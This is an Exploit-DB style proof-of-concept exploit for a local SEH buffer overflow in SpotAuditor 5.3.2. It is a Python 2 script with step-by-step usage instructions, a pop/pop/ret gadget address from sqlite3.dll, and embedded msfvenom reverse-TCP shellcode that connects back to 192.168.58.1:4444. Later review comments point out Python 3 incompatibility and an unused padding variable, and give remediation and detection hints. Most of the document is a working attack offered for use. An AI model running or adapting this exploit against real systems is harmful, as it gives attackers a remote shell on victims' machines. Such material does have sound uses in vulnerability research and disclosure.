# Exploit Title: SpotAuditor 5.3.2 - 'Base64' Local Buffer Overflow (SEH)
# Exploit Author: Kirill Nikolaev
# Date: 2019-12-06
# Vulnerable Software: SpotAuditor
# Vendor Homepage: http://www.nsauditor.com/
# Version: 5.3.2
# Software Link: http://spotauditor.nsauditor.com/downloads/spotauditor_setup.exe
# Tested Windows 7 SP1 x86
# PoC
# 1. Download and install SpotAuditor
# 2. Change shellcode in python script to yours
# 3. Generate payload with python script
# 4. Run the software "Tools -> Base64 Encrypted Password"
# 5. Take a shell
# Original DOS exploit https://www.exploit-db.com/exploits/47719
#!/usr/bin/env python
#
# NOTE(review): this is Python 2 code. `buf` starts as a str and is extended
# with b"..." literals, and base64.b64encode() is handed a str; under Python 3
# the first `buf +=` line raises TypeError (str += bytes).
import base64

print ("[+] Thank you for choosing our company")
print ("[+] Local Buffer Overflow (SEH) in SpotAuditor 5.3.2")
print ("[+] Created By Kirill Nikolaev")
print ("[+] Generate payload,check, that you take your shellcode")
print ("")

# Layout of the string that is concatenated into `shellcode` below, in order:
#   head (1024) | jmp_across (4) | seh (4) | header_for_shellcode (10) | buf
# Only these five parts are joined; see the note on `tail` further down.

# 1024 filler bytes preceding the SEH record.
head='A'*1024

# nSEH slot (4 bytes). Per the author's comment, eb0c is a short forward jmp
# that steps over the handler address stored right after it.
#eb0c-jmp across a few bytes with seh address
jmp_across='\x41\x41\xeb\x0c'

# SEH handler slot, written little-endian. The annotation below (mona-style)
# records why this particular address is stable: the module it lives in was
# built without SafeSEH, ASLR or rebasing. For the vendor that is the
# remediation lever -- a module shipped with SafeSEH and ASLR enabled would
# not provide a fixed, handler-whitelisted pop/pop/ret address, and the
# overwrite would be caught by SEH validation instead of dispatched.
#0x61e0b194 : pop ebx # pop ebp # ret | {PAGE_EXECUTE_READ} [sqlite3.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v3.15.2 (C:\Program Files\Nsasoft\SpotAuditor\sqlite3.dll)
seh='\x94\xb1\xe0\x61'

# 10 filler bytes between the handler address and the start of `buf`.
header_for_shellcode='\x41'*10

# Second stage generated by msfvenom (command recorded in the comment below);
# the PoC steps above expect the reader to regenerate it, which is why the
# banner asks to check the shellcode. EXITFUNC=thread and the \x00 bad-char
# exclusion are the author's generator options, not something this script
# validates.
#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.58.1 LPORT=4444 -f py EXITFUNC=thread -b '\x00'
buf = ""
buf += b"\xbd\x7a\xfe\x84\xdd\xdb\xc9\xd9\x74\x24\xf4\x58\x31"
buf += b"\xc9\xb1\x52\x83\xe8\xfc\x31\x68\x0e\x03\x12\xf0\x66"
buf += b"\x28\x1e\xe4\xe5\xd3\xde\xf5\x89\x5a\x3b\xc4\x89\x39"
buf += b"\x48\x77\x3a\x49\x1c\x74\xb1\x1f\xb4\x0f\xb7\xb7\xbb"
buf += b"\xb8\x72\xee\xf2\x39\x2e\xd2\x95\xb9\x2d\x07\x75\x83"
buf += b"\xfd\x5a\x74\xc4\xe0\x97\x24\x9d\x6f\x05\xd8\xaa\x3a"
buf += b"\x96\x53\xe0\xab\x9e\x80\xb1\xca\x8f\x17\xc9\x94\x0f"
buf += b"\x96\x1e\xad\x19\x80\x43\x88\xd0\x3b\xb7\x66\xe3\xed"
buf += b"\x89\x87\x48\xd0\x25\x7a\x90\x15\x81\x65\xe7\x6f\xf1"
buf += b"\x18\xf0\xb4\x8b\xc6\x75\x2e\x2b\x8c\x2e\x8a\xcd\x41"
buf += b"\xa8\x59\xc1\x2e\xbe\x05\xc6\xb1\x13\x3e\xf2\x3a\x92"
buf += b"\x90\x72\x78\xb1\x34\xde\xda\xd8\x6d\xba\x8d\xe5\x6d"
buf += b"\x65\x71\x40\xe6\x88\x66\xf9\xa5\xc4\x4b\x30\x55\x15"
buf += b"\xc4\x43\x26\x27\x4b\xf8\xa0\x0b\x04\x26\x37\x6b\x3f"
buf += b"\x9e\xa7\x92\xc0\xdf\xee\x50\x94\x8f\x98\x71\x95\x5b"
buf += b"\x58\x7d\x40\xcb\x08\xd1\x3b\xac\xf8\x91\xeb\x44\x12"
buf += b"\x1e\xd3\x75\x1d\xf4\x7c\x1f\xe4\x9f\x42\x48\xdc\x5e"
buf += b"\x2b\x8b\x20\x70\xf7\x02\xc6\x18\x17\x43\x51\xb5\x8e"
buf += b"\xce\x29\x24\x4e\xc5\x54\x66\xc4\xea\xa9\x29\x2d\x86"
buf += b"\xb9\xde\xdd\xdd\xe3\x49\xe1\xcb\x8b\x16\x70\x90\x4b"
buf += b"\x50\x69\x0f\x1c\x35\x5f\x46\xc8\xab\xc6\xf0\xee\x31"
buf += b"\x9e\x3b\xaa\xed\x63\xc5\x33\x63\xdf\xe1\x23\xbd\xe0"
buf += b"\xad\x17\x11\xb7\x7b\xc1\xd7\x61\xca\xbb\x81\xde\x84"
buf += b"\x2b\x57\x2d\x17\x2d\x58\x78\xe1\xd1\xe9\xd5\xb4\xee"
buf += b"\xc6\xb1\x30\x97\x3a\x22\xbe\x42\xff\x42\x5d\x46\x0a"
buf += b"\xeb\xf8\x03\xb7\x76\xfb\xfe\xf4\x8e\x78\x0a\x85\x74"
buf += b"\x60\x7f\x80\x31\x26\x6c\xf8\x2a\xc3\x92\xaf\x4b\xc6"

# NOTE(review): `tail` is computed here but never used; it is not part of
# the `shellcode` concatenation below, so the output is 1042 + len(buf)
# bytes before base64 encoding rather than the 5000 this arithmetic targets.
tail='B'*(5000-1028-4-10-len(buf))

shellcode=head+jmp_across+seh+header_for_shellcode+buf

# The target dialog consumes base64, so the raw string is encoded for pasting.
# For detection purposes, the decoded input is recognisable by its shape: a
# long run of 0x41 followed by a non-ASCII 4-byte address and the encoded stage.
print (base64.b64encode(shellcode))

# -- Best regards, Kirill Nikolaev Penetration Tester